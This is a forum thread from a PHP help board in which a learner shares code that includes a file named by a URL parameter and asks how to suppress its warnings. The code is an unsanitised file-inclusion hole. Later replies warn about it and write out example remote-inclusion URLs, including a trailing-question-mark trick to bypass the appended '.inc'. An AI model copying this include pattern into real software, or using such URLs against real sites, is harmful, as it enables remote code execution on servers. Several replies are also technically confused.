Jump to content
Latest Mentoring Zoom Meetings uploaded - June 25 2025

Show include file after clicking link

Wickham

By Wickham
in PHP

 Share

Recommended Posts

Wickham Newbie

Wickham

Posted
Posted (edited)

I've been told about a PHP code that allows an include file to show something on the same page only after a link is clicked; it's better than Javascript because it works when javascript is disabled and the code is very small:-

 

http://www.wickham43.com/test/php-show-form.php

 

Form 1

 

<?php

error_reporting(0);

include ($_GET['f'].".inc");

?>

 

and the form1.inc just has the form code.

 

At first I was trying it without error_reporting(0); but although it worked I got several warnings on the online page that showed on the page:-

 

Warning: include(.inc) [function.include]: failed to open stream: No such file or directory in /home/my-username/public_html/sub-directory/php-show-form.php on line 25

 

Warning: include(.inc) [function.include]: failed to open stream: No such file or directory in /home/my-username/public_html/sub-directory/php-show-form.php on line 25

 

Warning: include() [function.include]: Failed opening '.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/my-username/public_html/sub-directory/php-show-form.php on line 25

 

Line 25 was <?php include ($_GET['f'].".inc");?>

 

The warnings for the same page in WampServer were:-

 

Notice: Undefined index: f in C:\wamp\www\test\php-show-form.php on line 25

 

Warning: include(.inc) [function.include]: failed to open stream: No such file or directory in C:\wamp\www\test\php-show-form.php on line 25

 

Warning: include() [function.include]: Failed opening '.inc' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\test\php-show-form.php on line 25

 

Is it expecting a variable somewhere? Is there a better code without warnings?

 

I've also tried

 

Form 1

 

<?php include ($_GET[f]);?>

 

where the .inc is in the link instead of the include which also works but I still get warnings, just one less warning.

 

EDIT: I've just got an answer from the guy who told me the code (he had to work it out):-

 

Form 1

<?php if ($_GET['f']) {include ($_GET['f'].".inc");} ?>

 

error_reporting(0); not required.

 

As an extra question why and what is f? If I substitute g or id it doesn't work, so f must be a PHP operator and it's not a variable. Where can I find out what its features are?

Edited by Wickham
dms Newbie

dms

Posted
Posted

Just learning PHP myself, but I do remember reading something about setting the include_path in the php.ini file. Maybe this is something worth looking into.

 

I would think that [f] would be the index or key within the $_GET array, which is a variable, so you may trying placing double quotes around it. This is a bit over my head. Good luck.

falkencreative Newbie

falkencreative

Posted
Posted

"f" is a variable in the url: Form 1

 

In this case, f = "form1.inc"

 

The "f" variable doesn't have to be called "f" it could easily be "include" or something else you specified. In that case though, you'd need to update the code:

 

Form 1

 

and

 

<?php if ($_GET['include']) {include ($_GET['include'].".inc");} ?>

dms Newbie

dms

Posted
Posted

You must have 'f' set to 0 (f=0) in you php script or not set at all.

Then you must have an the if statement to where... if('f'=form1) the form is included in the page.

 

So, within the link you are resending 'f' through the super global $_get and setting the value to 'form1' which would include the form within the page.

 

Try this: click on your Form 1 link to display the form and then in the url change [?f=form1] to [?f=0] and see what happens. The page will be redisplayed without the form, because 'f' was reset to false which would cause the if statement not to elevate to true, so the form will not be displayed.

 

I believe that [f] is the key in the $_GET array which corresponds to the variable $f in your php code.

 

I hope this is making since, because I'm just learning this myself.

Wickham Newbie

Wickham

Posted
  • Author
Posted (edited)

Thanks for the warning. I had included error_reporting(0); in my first attempt but deleted it when I got the correct code, thinking it wasn't necessary, but I've now put it back in and it stops anyone from seeing the username now (unless there is another way to get someone's username).

 

I had noticed that my username showed in the warning messages for eveyone to see, but not the password. However, it's obviously not a good idea to show the username in a warning message. Tell me if you can still see my username with this revised page:-

 

http://www.wickham43.com/test/php-show-form.php

Edited by Wickham
falkencreative Newbie

falkencreative

Posted
Posted

The issue is not that your username will show up. The issue is that the user could modify the URL to include files you did not originally intend to be included. They could try to show other files on your server, or even link their own php scripts like so:

 

filename2.php?f=http://www.theirsite.com/theirfile.com

Wickham Newbie

Wickham

Posted
  • Author
Posted (edited)

I've just tried to do what you mentioned, adding another of my website addresses to the f= instead of the "include" file that I had, and it didn't do anything, just showed the page with the link and nothing included below. Perhaps it's because I now have error_reporting(0); in the PHP code but also because the PHP code adds .inc on the end of whatever is after f= so a full url would have .inc added and be a 404 "not found" if it was partly successful.

 

It would show any other .inc file that I might have on the same directory but there is only one and someone would have to guess its name.

 

However. I really only experimented with the code to learn some more PHP. If it's a dangerous code, what do the experts use to open another file in the same web page from a link (apart from Ajax) or can the code be modified?

Edited by Wickham
ASDx Newbie

ASDx

Posted
Posted

if someone icluded a file from a remote website followed by ? it it wll completely igonre anything after they dangerous code for example http://www.wickham43.com/test/php-show-form.phpf=http://s.rr/php_with_some_unix_commands.txt? it will be http://www.wickham43.com/test/php-show-form.php?f=http://h.sr/php_with_some_unix_commands.txt?.inc and everything after ? is ignored so your .inc is will be treated as a part of the query string.

dms Newbie

dms

Posted
Posted (edited)

Since this method is being used to retrieve a form, not submit one; I don't understand how someone could inject something into the 'url', after the fact.

Edited by dms

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
 Share
Go to topic listing
×
×
  • Create New...